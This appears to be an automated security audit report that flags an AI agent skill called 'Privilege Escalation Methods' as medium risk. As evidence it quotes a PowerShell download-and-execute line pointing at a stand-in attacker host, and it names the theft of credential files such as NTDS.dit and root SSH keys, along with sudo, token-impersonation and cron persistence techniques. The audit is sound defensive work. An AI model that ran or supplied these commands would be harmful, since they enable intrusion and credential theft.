Privilege Escalation Methods
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION
Full Analysis
- Privilege Escalation (MEDIUM): The skill details numerous methods to gain unauthorized root or system access. Evidence includes sudo misconfigurations (vim, find, awk), capability exploits, and Windows token impersonation (SweetPotato, SharpImpersonation).
- Unverifiable Dependencies & Remote Code Execution (MEDIUM): Detects instructions to download and execute code from remote servers. Evidence: PowerShell 'iex (iwr http://attacker/shell.ps1)' patterns for payload delivery.
- Data Exposure & Exfiltration (MEDIUM): Provides commands for stealing critical system credentials and private keys. Evidence: Extraction of 'NTDS.dit', SYSTEM hives, and private SSH keys ('/root/.ssh/id_rsa').
- Persistence Mechanisms (MEDIUM): Instructions for maintaining long-term access to a system. Evidence: Use of 'schtasks' and 'cron' job injection to execute arbitrary commands.
Audit Metadata